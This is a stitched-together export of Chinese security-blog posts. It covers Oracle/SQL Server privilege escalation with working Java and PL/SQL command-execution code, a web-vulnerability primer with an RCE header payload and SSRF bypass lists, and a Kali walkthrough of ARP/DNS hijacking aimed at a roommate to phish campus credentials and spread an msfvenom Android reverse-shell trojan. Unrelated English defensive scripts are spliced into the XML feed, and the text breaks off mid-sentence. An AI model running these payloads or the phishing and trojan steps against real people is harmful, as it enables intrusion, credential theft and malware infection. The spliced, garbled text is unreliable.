class="hljs-string">'目标主机名'</span><br><span class="hljs-keyword">EXEC</span> sp_start_job <span class="hljs-variable">@job</span>_name <span class="hljs-operator">=</span> <span class="hljs-string">'GetSystemOnSQL'</span><br></code></pre></td></tr></table></figure><p>再执行命令<code>whoami</code>,发现系统权限已变为<code>authority/system</code>,说明提权成功。</p><h1 id="Oracle数据库提权"><a href="#Oracle数据库提权" class="headerlink" title="Oracle数据库提权"></a>Oracle数据库提权</h1><ul><li>利用Java包提权(数据库权限要求是最高的DBA权限)</li><li>OracleShell工具提权</li></ul><h2 id="利用Java包提权"><a href="#利用Java包提权" class="headerlink" title="利用Java包提权"></a>利用Java包提权</h2><p>Oracle提权漏洞集中存在于PL/SQL编写的函数、存储过程、包、触发器中。Oracle存在提权漏洞的一个重要原因是PL/SQL定义的两种调用权限导致(定义者权限和调用者权限)。定义者权限给了低权限用户在特定时期拥有高权限的可能,这就给提权操作奠定了基础。</p><p>即无论调用者权限如何,执行存储过程的结果权限永远为定义者的权限。因此,如果一个较高权限的用户定义了存储过程,并赋予了低权限用户调用权限,较低权限的用户即可利用这个存储过程提权。</p><p>Java具有一组非常强大的标准库,Oracle数据库支持使用Java来编写存储过程,那么攻击者就可以通过这一特性,在系统上执行Java代码,从而完成提权操作。</p><blockquote><p><strong>Oracle执行Java代码的过程(以DBMS_EXPORT_EXTENSION()为例)</strong></p><p>1、创建Java库</p><p>2、赋予Java权限</p><p>3、创建函数</p><p>4、赋予函数执行权限</p><p>5、执行</p></blockquote><p>首先,在拿到webshell的前提下,先遍历文件目录找到Oracle数据库登录信息,连接数据库后执行SQL语句<code>select * from session_roles</code>查看当前用户权限。如果是DBA权限则可进行以下操作:</p><p>1.通过sys.dbms_export_extension()创建Java包</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span 
class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs java">create or replace and compile<br>java source named <span class="hljs-string">"Util"</span><br>as<br><span class="hljs-keyword">import</span> java.io.*;<br><span class="hljs-keyword">import</span> java.lang.*; <br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Util</span> <span class="hljs-keyword">extends</span> <span class="hljs-title class_">Object</span><br>{<br><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-type">int</span> <span class="hljs-title function_">RunThis</span><span class="hljs-params">(String args)</span><br>{<br><span class="hljs-type">Runtime</span> <span class="hljs-variable">rt</span> <span class="hljs-operator">=</span> Runtime.getRuntime();<br><span class="hljs-type">int</span> <span class="hljs-variable">rc</span> <span class="hljs-operator">=</span> -<span class="hljs-number">1</span>; <br><span class="hljs-keyword">try</span><br>{<br><span class="hljs-type">Process</span> <span class="hljs-variable">p</span> <span class="hljs-operator">=</span> rt.exec(args);<br><span class="hljs-type">int</span> <span class="hljs-variable">bufSize</span> <span class="hljs-operator">=</span> <span class="hljs-number">4096</span>;<br><span class="hljs-type">BufferedInputStream</span> <span class="hljs-variable">bis</span> <span class="hljs-operator">=</span><br><span 
class="hljs-keyword">new</span> <span class="hljs-title class_">BufferedInputStream</span>(p.getInputStream(), bufSize);<br><span class="hljs-type">int</span> len;<br><span class="hljs-type">byte</span> buffer[] = <span class="hljs-keyword">new</span> <span class="hljs-title class_">byte</span>[bufSize];<br><span class="hljs-comment">// Echo back what the program spit out</span><br><span class="hljs-keyword">while</span> ((len = bis.read(buffer, <span class="hljs-number">0</span>, bufSize)) != -<span class="hljs-number">1</span>)<br>System.out.write(buffer, <span class="hljs-number">0</span>, len); <br>rc = p.waitFor();<br>}<br><span class="hljs-keyword">catch</span> (Exception e)<br>{<br>e.printStackTrace();<br>rc = -<span class="hljs-number">1</span>;<br>}<br><span class="hljs-keyword">finally</span><br>{<br><span class="hljs-keyword">return</span> rc;<br>}<br>}<br>}<br>/<br></code></pre></td></tr></table></figure><p>2.创建自定义函数</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs java">create or replace<br>function <span class="hljs-title function_">RUN_CMD</span><span class="hljs-params">(p_cmd in varchar2)</span> <span class="hljs-keyword">return</span> number<br>as<br>language java<br>name <span class="hljs-string">'Util.RunThis(java.lang.String) return integer'</span>;<br>/<br>create or replace procedure <span class="hljs-title 
function_">RC</span><span class="hljs-params">(p_cmd in varchar2)</span><br>as<br>x number;<br>begin<br>x := run_cmd(p_cmd);<br>end;<br>/<br>variable x number;<br>set serveroutput on<br>exec dbms_java.set_output(<span class="hljs-number">100000</span>);<br>grant javasyspriv to CMS<br>/<br></code></pre></td></tr></table></figure><p>3.连接Oracle数据库</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">connect</span> CMS<span class="hljs-operator">/</span>NSFCMS@(description<span class="hljs-operator">=</span>(address_list<span class="hljs-operator">=</span>(address<span class="hljs-operator">=</span>(protocol<span class="hljs-operator">=</span>tcp)(host<span class="hljs-operator">=</span>主机地址)(port<span class="hljs-operator">=</span>端口)))(connect_data<span class="hljs-operator">=</span>(SERVICE_NAME<span class="hljs-operator">=</span>ORACLE)));<br></code></pre></td></tr></table></figure><p>4.调用自定义函数执行命令</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">exec</span> : x :<span class="hljs-operator">=</span> RUN_CMD(<span class="hljs-string">'要执行的命令'</span>);<br></code></pre></td></tr></table></figure><p>注意这里的命令不能通过webshell执行,而是要通过数据库管理工具(例如SQLplus)执行,所以建议在可以远程连接服务器时使用这种方法。</p><h2 id="OracleShell工具提权"><a href="#OracleShell工具提权" class="headerlink" title="OracleShell工具提权"></a>OracleShell工具提权</h2><p>除此之外,我们也可以采用自动化工具OracleShell提权Oracle数据库,前提条件也是获取到dba的最高权限权限,并且需要知道SID,通常与账号密码在一起。<br>可以使用sqlmap检测是否为dbs权限,返回true则为dba权限:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">sqlmap 数据库类型://用户名:密码@URL/数据库名 --is-dba<br></code></pre></td></tr></table></figure><p><img 
src="https://s2.loli.net/2022/09/16/mIaPk8zxe56J1gn.png"></p><p>后面直接用工具连接即可。</p>]]></content>
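The preconditions the MySQL UDF, SQL Server and Oracle sections check by hand (secure_file_priv and plugin_dir, the sp_configure options, the Jet SandBoxMode value, the Agent job, and Oracle definer-rights procedures plus Java roles) can be turned into a defensive audit. The script below is an added example in Python, not code from the post or from any tool it mentions; it evaluates constructed snapshots of the same query results and flags the settings that make each escalation path possible.

```python
"""Exposure audit for the escalation paths described above: MySQL UDF,
SQL Server xp_cmdshell / OLE automation / Jet sandbox / Agent jobs, and
Oracle definer-rights procedures plus Java privileges. Added example, not
code from the post. Inputs are plain Python structures built from the
catalog queries the post uses; the sample data below is constructed so the
checks run offline."""

# --- MySQL: preconditions for loading a UDF through INTO DUMPFILE ---------
UDF_NAMES = {"sys_eval", "sys_exec", "cmdshell", "backshell"}  # names seen in the post


def audit_mysql(variables, func_rows):
    """variables: {name: value} from SHOW GLOBAL VARIABLES;
    func_rows: (name, dl) rows from mysql.func, the registered UDFs."""
    findings = []
    sfp = variables.get("secure_file_priv") or ""
    plugin_dir = variables.get("plugin_dir", "")
    if sfp == "":
        findings.append("HIGH mysql: secure_file_priv is empty, INTO DUMPFILE "
                        "can drop a library straight into plugin_dir")
    elif sfp.upper() != "NULL" and plugin_dir.lower().startswith(sfp.lower()):
        findings.append(f"HIGH mysql: secure_file_priv={sfp!r} covers plugin_dir={plugin_dir!r}")
    for name, dl in func_rows:
        level = "CRITICAL" if name.lower() in UDF_NAMES else "INFO"
        findings.append(f"{level} mysql: UDF {name} registered from {dl}")
    return findings


# --- SQL Server: options, Jet SandBoxMode and Agent job steps -------------
RISKY_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "Ad Hoc Distributed Queries"}
SHELL_MARKERS = ("xp_cmdshell", "xp_execresultset", "sp_oacreate", "openrowset")


def audit_mssql(configure_rows, sandbox_mode, job_steps):
    """configure_rows: (name, run_value) from sp_configure;
    sandbox_mode: the Jet 4.0 SandBoxMode registry value, None if absent;
    job_steps: (job_name, command) from msdb.dbo.sysjobsteps joined to sysjobs."""
    findings = []
    for name, run_value in configure_rows:
        if name in RISKY_OPTIONS and int(run_value) == 1:
            findings.append(f"HIGH mssql: option '{name}' is enabled")
    if sandbox_mode == 0:  # 0 = sandbox off for every caller, shell() reachable via OPENROWSET
        findings.append("HIGH mssql: Jet SandBoxMode is 0")
    for job_name, command in job_steps:
        hits = [m for m in SHELL_MARKERS if m in command.lower()]
        if hits:
            findings.append(f"HIGH mssql: Agent job '{job_name}' calls {', '.join(hits)}")
    return findings


# --- Oracle: powerful roles and definer-rights procedures exposed to others -
POWER_ROLES = {"DBA", "JAVASYSPRIV", "JAVA_ADMIN"}
ADMIN_ACCOUNTS = {"SYS", "SYSTEM"}


def audit_oracle(role_grants, procedures, exec_grants):
    """role_grants: (grantee, granted_role) from DBA_ROLE_PRIVS;
    procedures: (owner, object_name, authid) from DBA_PROCEDURES;
    exec_grants: (owner, table_name, grantee) from DBA_TAB_PRIVS where privilege = 'EXECUTE'."""
    findings = []
    privileged = set(ADMIN_ACCOUNTS)
    for grantee, role in role_grants:
        if role.upper() in POWER_ROLES:
            privileged.add(grantee.upper())
            if grantee.upper() not in ADMIN_ACCOUNTS:
                findings.append(f"HIGH oracle: {grantee} holds {role}")
    definer = {(o.upper(), n.upper()) for o, n, authid in procedures if authid.upper() == "DEFINER"}
    for owner, name, grantee in exec_grants:
        key = (owner.upper(), name.upper())
        if key in definer and owner.upper() in privileged and grantee.upper() not in privileged:
            findings.append(f"HIGH oracle: definer-rights {owner}.{name} is executable by {grantee}, "
                            f"who then runs with the privileges of {owner}")
    return findings


# Constructed snapshots mirroring the post's scenarios (not taken from real hosts).
SAMPLE_MYSQL_VARS = {"secure_file_priv": "", "plugin_dir": "C:\\phpStudy\\MySQL\\lib\\plugin\\"}
SAMPLE_MYSQL_FUNC = [("sys_eval", "udf.dll")]
SAMPLE_MSSQL_CONF = [("show advanced options", 1), ("xp_cmdshell", 1),
                     ("Ole Automation Procedures", 0), ("Ad Hoc Distributed Queries", 1)]
SAMPLE_MSSQL_JOBS = [("GetSystemOnSQL", "exec master..xp_execresultset N'select ...'")]
SAMPLE_ORA_ROLES = [("SYSTEM", "DBA"), ("CMS", "JAVASYSPRIV")]
SAMPLE_ORA_PROCS = [("SYSTEM", "RUN_CMD", "DEFINER")]
SAMPLE_ORA_EXEC = [("SYSTEM", "RUN_CMD", "PUBLIC")]


def run_sample_audit():
    """Run all three audits on the constructed snapshots and return the findings."""
    return (audit_mysql(SAMPLE_MYSQL_VARS, SAMPLE_MYSQL_FUNC)
            + audit_mssql(SAMPLE_MSSQL_CONF, 0, SAMPLE_MSSQL_JOBS)
            + audit_oracle(SAMPLE_ORA_ROLES, SAMPLE_ORA_PROCS, SAMPLE_ORA_EXEC))


if __name__ == "__main__":
    for line in run_sample_audit():
        print(line)
```

To use it against a real server, feed each function the rows returned by the query named in its docstring; a clean result is an empty list.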
<categories>
<category>Web安全</category>
</categories>
<tags>
<tag>权限提升</tag>
</tags>
</entry>
<entry>
<title>Web漏洞综合</title>
<link href="/2021/10/13/Web%E6%BC%8F%E6%B4%9E%E7%BB%BC%E5%90%88/"/>
<url>/2021/10/13/Web%E6%BC%8F%E6%B4%9E%E7%BB%BC%E5%90%88/</url>
<content type="html"><![CDATA[<p>I have been busy with coursework lately and had no time to organise my notes. With the Mid-Autumn holiday here, I am summarising what I learned last week. Several of the attack methods in these notes are rarely used in red-team engagements today, so a basic understanding is enough, but they come up often in security-services interviews.</p>
<h2 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h2>
<p>XSS, Cross Site Scripting, is abbreviated XSS rather than CSS to avoid confusion with Cascading Style Sheets. An attacker inserts malicious script into a web page; when a user views the page, the embedded script executes, attacking the user. XSS is an attack on the user, not the server.</p>
<p>XSS comes in three types: stored, reflected and DOM-based.</p>
<p>Stored XSS: persistent; the code is stored on the server, for example in profile fields or posted articles. If input is not filtered, or is filtered poorly, the code is saved on the server and executes whenever a user visits the page. This is the most dangerous type and easily leads to worms and cookie theft.</p>
<p>Reflected XSS: non-persistent; the victim has to be tricked into clicking a link for the code to fire (the server stores no such page or content). It typically appears in search pages and is mostly used to steal cookies.</p>
<p>DOM-based XSS: does not go through the back end. It is based on the Document Object Model (DOM) and is triggered by parameters passed in the URL; it is really a kind of reflected XSS.</p>
<h2 id="命令执行(RCE)"><a href="#命令执行(RCE)" class="headerlink" title="Command execution (RCE)"></a>Command execution (RCE)</h2>
<p>A command-execution vulnerability exists when the server does not filter the commands it executes, so a user can run arbitrary system commands. It is one of the high-risk vulnerability classes.</p>
<p>In PHP, command execution mostly stems from insufficient filtering of the arguments to the functions that run commands: <code>system( )</code>, <code>exec( )</code>, <code>shell_exec( )</code>, <code>passthru( )</code>, <code>pcntl_execl( )</code>, <code>popen( )</code>, <code>proc_open( )</code> and others. When an attacker controls those arguments, a malicious system command can be appended to the normal one. PHP runs commands with the privileges of the web-server user, which can usually write to the web directory, so the impact is severe.</p>
<p>In the webug lab used as the example, a command-execution vulnerability exists when the PHP version is 5.2.17 or 5.4.45. It is enough to intercept the login request and add the headers <code>Accept-Encoding:gzip,deflate</code> and <code>Accept-Charset:c3lzdGVtKCdscycpOw==</code> (where c3lzdGVtKCdscycpOw== is the base64 encoding of system('ls');) to see the result in the response. When the site runs on thinkPHP, a public exploit can be used instead.</p>
<h2 id="逻辑漏洞"><a href="#逻辑漏洞" class="headerlink" title="Logic flaws"></a>Logic flaws</h2>
<p>There are three kinds of authorisation flaws:</p>
<p>1. Horizontal privilege escalation: an ordinary user or administrator can access information or functions that belong to another ordinary user or administrator.</p>
<p>2. Vertical privilege escalation: an ordinary user can access information or functions reserved for administrators or even super-administrators.</p>
<p>3. Unauthenticated access: a visitor can access information or functions reserved for ordinary users or even super-administrators.</p>
<p>Others include tampering with payment amounts, integer overflow, password-reset abuse and brute-forcing verification codes, which I will not go into here.</p>
<h2 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h2>
<p>CSRF (Cross Site Request Forgery) is an attack that was listed in 2007 as one of the 20 biggest security risks on the Internet. Also known as a "One Click Attack" or Session Riding and abbreviated CSRF or XSRF, it is a malicious exploitation of a website. Although it sounds like cross-site scripting (<a href="https://link.jianshu.com/?t=http://baike.baidu.com/view/50325.htm">XSS</a>), it is very different and works almost the opposite way: XSS exploits the site's trust in its users, while CSRF exploits the site's trust in a request that appears to come from a trusted user. Compared with <a href="https://link.jianshu.com/?t=http://baike.baidu.com/view/50325.htm">XSS</a>, CSRF is less widespread (so resources for defending against it are scarce) and harder to defend against, which is why it is considered more dangerous than <a href="https://link.jianshu.com/?t=http://baike.baidu.com/view/50325.htm">XSS</a>.</p>
<p>Because the conditions in practice are strict (the cookie must still be valid and the parameters must be known), it is rarely used now. The method is to build a forged page locally whose form submits the same parameters as the target site, lure the administrator through social engineering into clicking the button that submits the pre-filled parameters to create a new administrator account, and then combine this with privilege escalation to obtain a webshell.</p>
<h2 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a>SSRF</h2>
<p>SSRF (Server-Side Request Forgery) is a vulnerability in which the attacker constructs a request that the server then issues. The usual target is an internal system that cannot be reached from the Internet.</p>
<p>Many web applications fetch data from other servers: given a user-supplied URL they retrieve images, download files or read file contents. Abused, this feature turns the vulnerable application into a proxy for attacking remote and local servers.</p>
<p>The server offers a feature that fetches data from other servers and applies no filtering or restriction to the target address. In most web architectures the web server can reach both the Internet and the internal network it sits on.</p>
<p><strong>What can SSRF be used for?</strong></p>
<ul><li>Port-scanning the internal network or the local host behind the public server, and collecting service banners.</li><li>Attacking applications running on the internal network or the local host.</li><li>Fingerprinting internal web applications by requesting their default files.</li><li>Attacking internal and external web applications: SQL injection, Struts2, Redis and so on.</li><li>Reading local files through the file protocol.</li></ul>
<h2 id="反序列化"><a href="#反序列化" class="headerlink" title="Deserialisation"></a>Deserialisation</h2>
<p>Serialisation and deserialisation exist in Java and PHP; attacks usually rely on a public exploit or on constructing a malicious class. Many middleware products have deserialisation vulnerabilities, for example fastjson, Struts2, Shiro and WebLogic. I will examine the underlying principles in the Java security part later.</p>
<h2 id="常问面试题"><a href="#常问面试题" class="headerlink" title="Common interview questions"></a>Common interview questions</h2>
<p>1. SSRF filters 127.0.0.1; how do you bypass it?</p>
<blockquote><p>localhost</p><p>Hexadecimal encoding</p><p>@ (for example <a href="http://example.com@127.0.0.1/">http://example.com@127.0.0.1</a>)</p><p>Short links</p><p>A full-width stop instead of a dot</p><p>DNS resolution</p><p>Other protocols (gopher, sftp and so on)</p></blockquote>
<p>2. What are the dangerous PHP code-execution functions and the PHP command-execution functions?</p>
<blockquote><p>Dangerous PHP code-execution functions:</p></blockquote>
<figure class="highlight php"><table><tr><td class="code"><pre><code class="hljs php">call_user_func()<br>call_user_func_array()<br>create_function()<br>array_map()<br></code></pre></td></tr></table></figure>
<blockquote><p>PHP command-execution functions:</p></blockquote>
<figure class="highlight php"><table><tr><td class="code"><pre><code class="hljs php">system()<br>shell_exec()<br>passthru()<br>exec()<br>popen()<br>proc_open()<br>putenv()<br></code></pre></td></tr></table></figure>
<p>3. How does the fastjson vulnerability work?</p>
<blockquote><p>A malicious JSON payload is sent in the request. When parsing the JSON object, fastjson does not filter the @type field, so the attacker can specify the TemplatesImpl class. That class has a _bytecodes field, and some of its methods instantiate Java objects from _bytecodes; fastjson therefore lets the attacker name a class through a field and have that class's constructor run when the object is created.</p></blockquote>
<p>4. How does the Shiro deserialisation vulnerability work, and how is it found?</p>
<blockquote><p>It comes from Shiro's remember-me feature: after a successful login a cookie is generated, encrypted and encoded, and saved in the browser for convenience. The server processes that cookie by reading it from the browser, base64-decoding it, AES-decrypting it and then deserialising it for validation. The vulnerability lies there: the AES key is hard-coded with a default value, and if the developer did not change it, or chose a weak one, the cookie can be rebuilt. The attacker constructs malicious code, serialises it, AES-encrypts it with the recovered key, base64-encodes it and presents it as the new cookie; when the server follows the same processing steps the malicious code executes on the server.</p><p>It can be spotted because a failed login returns a rememberMe=deleteMe field, or by passive scanning with shiroScan.</p></blockquote>
<p>5. How do you exploit Shiro when the host has no outbound access?</p>
<blockquote><p>1. Locate the web directory and write a file</p><p>2. Construct output echo</p><p>3. Use an in-memory webshell</p><p>4. Use time delays to obtain the web path and write a webshell</p></blockquote>
<p>6. What are the differences between XSS, CSRF and SSRF?</p>
<blockquote><p>XSS: the server does not sufficiently filter user input, so when the client browser renders the returned HTML page, unexpected script statements execute.</p><p>CSRF: the server does not validate submitted data with a random token and does not strictly check the Referer header of the HTTP request, so an attacker can use the user's cookie to forge requests to the server.</p><p>SSRF: the server trusts user-controlled URLs too much and neither restricts the address nor checks the attacker-supplied URL adequately, so the attacker can use it as a pivot to attack the internal network or other servers.</p></blockquote>
<h2 id="总结"><a href="#总结" class="headerlink" title="Summary"></a>Summary</h2>
<p>This concludes the study of the top-10 web security vulnerabilities; next week moves on to privilege escalation, stay tuned!</p>]]></content>
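The bypasses listed in the answer to question 1 all defeat a filter that only looks for the literal string 127.0.0.1. As an added example (not code from the post), the validator below normalises the host and checks every address it maps to against the internal ranges instead; the SAMPLE_DNS table and sample_lookup are constructed stand-ins for real DNS so it runs offline, and the resolve callback is the one assumption the caller supplies.

```python
"""Validator for user-supplied URLs that closes the bypasses listed above
(localhost, hex or decimal addresses, credentials before an @, full-width
dots, alternative schemes and hostnames that resolve to internal ranges).
Added example, not code from the post; SAMPLE_DNS and sample_lookup are
constructed so the check runs offline."""
import ipaddress
import string
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Ideographic and full-width stops that some parsers fold into an ASCII dot.
FAKE_DOTS = str.maketrans({"\u3002": ".", "\uff0e": ".", "\uff61": "."})


def _decode_part(part):
    """Decode one dotted-address part the way inet_aton does: 0x hex, leading-0 octal, else decimal."""
    if part[:2].lower() == "0x":
        digits, base = part[2:], 16
        valid = bool(digits) and all(c in string.hexdigits for c in digits)
    elif len(part) > 1 and part[0] == "0":
        digits, base = part, 8
        valid = all(c in "01234567" for c in part)
    else:
        digits, base = part, 10
        valid = part.isdigit()
    return int(digits, base) if valid else None


def numeric_ipv4(host):
    """Return the 32-bit value of a short or non-dotted IPv4 form such as 127.1,
    0x7f000001 or 2130706433, or None when the host is not such a form."""
    parts = host.split(".")
    if len(parts) > 4:
        return None
    values = [_decode_part(p) for p in parts]
    if None in values:
        return None
    # inet_aton semantics: every part but the last is one byte, the last fills the rest
    widths = [8] * (len(values) - 1) + [32 - 8 * (len(values) - 1)]
    address = 0
    for value, width in zip(values, widths):
        if value.bit_length() > width:
            return None
        address = address * 2 ** width + value
    return address


def is_internal(ip):
    """True for loopback, private, link-local, multicast, reserved or unspecified addresses."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_url(url, resolve):
    """Return 'ok' or the reason the URL must be rejected. resolve(host) returns
    the list of IP strings for a name; connect to the validated address afterwards
    rather than resolving again, so a second DNS answer cannot differ."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return "userinfo (@) not allowed"
    host = (parts.hostname or "").translate(FAKE_DOTS).rstrip(".")
    if not host:
        return "missing host"
    if host == "localhost" or host.endswith(".localhost"):
        return "localhost not allowed"
    try:
        candidates = [ipaddress.ip_address(host)]
    except ValueError:
        packed = numeric_ipv4(host)
        if packed is not None:
            candidates = [ipaddress.IPv4Address(packed)]
        else:
            answers = resolve(host)
            if not answers:
                return "unresolvable host"
            candidates = [ipaddress.ip_address(a) for a in answers]
    for ip in candidates:
        if is_internal(ip):
            return f"resolves to internal address {ip}"
    return "ok"


# Constructed resolver table standing in for real DNS (example.com is reserved for documentation).
SAMPLE_DNS = {"example.com": ["93.184.216.34"], "intranet.test": ["10.0.0.5"]}


def sample_lookup(host):
    return SAMPLE_DNS.get(host, [])


if __name__ == "__main__":
    for candidate in ("http://example.com/avatar.png", "http://127.1/", "http://0x7f000001/",
                      "http://example.com@127.0.0.1/", "gopher://example.com/",
                      "http://intranet.test/admin", "http://127\u30020\u30020\u30021/"):
        print(candidate, "->", check_url(candidate, sample_lookup))
```

Short links and other redirects are handled by re-running check_url on every hop instead of following redirects automatically.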
<categories>
<category>Web安全</category>
</categories>
</entry>
<entry>
<title>Kali渗透(一)--DNS域名劫持与钓鱼</title>
<link href="/2021/10/10/Kali%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%80%EF%BC%89-DNS%E5%9F%9F%E5%90%8D%E5%8A%AB%E6%8C%81%E4%B8%8E%E9%92%93%E9%B1%BC/"/>
<url>/2021/10/10/Kali%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%80%EF%BC%89-DNS%E5%9F%9F%E5%90%8D%E5%8A%AB%E6%8C%81%E4%B8%8E%E9%92%93%E9%B1%BC/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="Preface"></a>Preface</h2>
<p>Lately my roommate's all-night gaming sessions have been getting to me, and since I happen to be learning Kali Linux, this trick came to mind.</p>
<p>Below I will demonstrate how to use ettercap, an ARP-spoofing-based network sniffer bundled with Kali Linux, to hijack DNS for a Win7 host on the local network, so that whenever the victim host visits any website's domain it is redirected to a malicious page chosen by the Kali attack machine, <strong>carrying out a phishing attack</strong>. This experiment is internal-network penetration; no callback over a public IP is involved. Do not break into other people's devices illegally; obey the law, for the net of justice is wide and lets nothing slip through.</p>
<p><strong>Environment</strong></p>
<table><thead><tr><th>Host</th><th>Role</th><th>IP address</th></tr></thead><tbody><tr><td>Kali Linux 2021.3</td><td>Attacker</td><td>192.168.149.128</td></tr><tr><td>Windows 7</td><td>Victim</td><td>192.168.149.129</td></tr><tr><td>Windows 10</td><td>Victim</td><td>192.168.149.130</td></tr><tr><td>(can be a remote server or the Kali attack machine)</td><td>Phishing server</td><td>xxx.xxx.xxx.xxx</td></tr></tbody></table>
<p><strong>DNS hijacking</strong></p>
<p>1. What is DNS (domain name) hijacking</p>
<p>DNS hijacking, also called domain hijacking, means intercepting domain name resolution requests within the hijacked network range, analysing the requested domain, letting requests outside the scope of inspection pass, and otherwise returning a fake IP address or doing nothing so that the request goes unanswered. The effect is that particular sites cannot be reached, or a fake site is reached instead.</p>
<p>2. Consequences of DNS hijacking</p>
<p>Large-scale DNS hijacking often results in an outage: major websites receive so much traffic that the phishing server cannot withstand the load and collapses instantly, and what users see is pages that fail to load. Sensitive sites such as online shopping and online payment may be maliciously pointed at phishing sites, putting personal account credentials at risk of leakage.</p>
<p>3. How the domain hijacking in this post works</p>
<p>This attack is based on ARP spoofing within the LAN. An ARP attack forges IP and MAC addresses to achieve ARP spoofing; it can generate large volumes of ARP traffic that congest the network, and as long as the attacker keeps sending forged ARP replies it can alter the IP-MAC entries in the target host's ARP cache, causing a network outage or a man-in-the-middle attack.</p>
<blockquote><p>In essence, the attack in this post uses Ettercap's ARP spoofing to make the Win 7 victim host mistake the Kali attacker's IP for the gateway IP; the Kali machine then further points the domains the victim visits at an IP address of its own choosing, achieving a phishing attack.</p></blockquote>
<h2 id="演示"><a href="#演示" class="headerlink" title="Demonstration"></a>Demonstration</h2>
<p>1. Edit ettercap's dns file and append the two resolution entries shown in the red box in the figure below (change the IP address to the phishing site's) so that every site the victim visits resolves to the phishing site's IP address.</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">vim <span class="hljs-regexp">/etc/</span>ettercap/etter.dns<br></code></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/09/16/kj7B4mic13GfrwL.png" alt="img"></p>
<p>2. Start ettercap:</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">ettercap -G</span><br></code></pre></td></tr></table></figure>
<p>3. In VMware's "Edit - Virtual Network Editor", look up the default gateway of the virtual adapter used for NAT mode (vmnet8), and in the host machine's "Network Connections" configure vmnet8 as shown below (the subnet may differ; adjust to your situation):</p>
<p><img src="https://s2.loli.net/2022/09/16/4cMTNzHh7yIfGt9.png" alt="img"></p>
<p>4. Configure ettercap's network interface:</p>
<p><img src="https://s2.loli.net/2022/09/16/mSjogFGTvLWezHE.png" alt="img"></p>
<p>5. Scan for live hosts on the LAN:</p>
<p><img src="https://s2.loli.net/2022/09/16/QZ4DFVLHocUqj7B.png" alt="img"></p>
<p>6. Select the gateway and add to target 1, then select the target and add to target 2:</p>
<p><img src="https://s2.loli.net/2022/09/16/1ldhztbjAuovQpe.png" alt="img"></p>
<p>7. Choose the ARP attack and tick the first option:</p>
<p><img src="https://s2.loli.net/2022/09/16/Xq1FNS3Ghuy8Qpn.png" alt="img"></p>
<p><img src="https://s2.loli.net/2022/09/16/QBT71kWYEfSLgt4.png" alt="img"></p>
<p>8. After starting the attack, open the plugins and double-click dns_spoof to perform DNS poisoning:</p>
<p><img src="https://s2.loli.net/2022/09/16/vkJhz8FcGlxmdrb.png" alt="img"></p>
<p>9. Click the start button to begin the attack:</p>
<p><img src="https://s2.loli.net/2022/09/16/XEn8r19ZFjCzhfv.png" alt="img"></p>
<p>10. Whatever page the victim visits, they are forcibly redirected to the phishing site set up in advance:</p>
<p><img src="https://s2.loli.net/2022/09/16/53rse4VSxRLu1Un.png" alt="img"></p>
<p>Paired with back-end PHP code connected to a database, this can capture the victim's campus network account and password. Our goal here, however, is to lure the victim into downloading a trojan and getting it to call back. For that we use msf to generate an Android trojan:</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">msfvenom -p android<span class="hljs-regexp">/meterpreter/</span>reverse_tcp LHOST=kali本机ip LPORT=监听端口 R > <span class="hljs-regexp">/放置的目录/</span>文件名.apk<br></code></pre></td></tr></table></figure>
<p>Because many phones today refuse to install unsigned apk files, we can use Android Killer to change the trojan's icon and name and sign it. Alternatively, use the commands:</p>
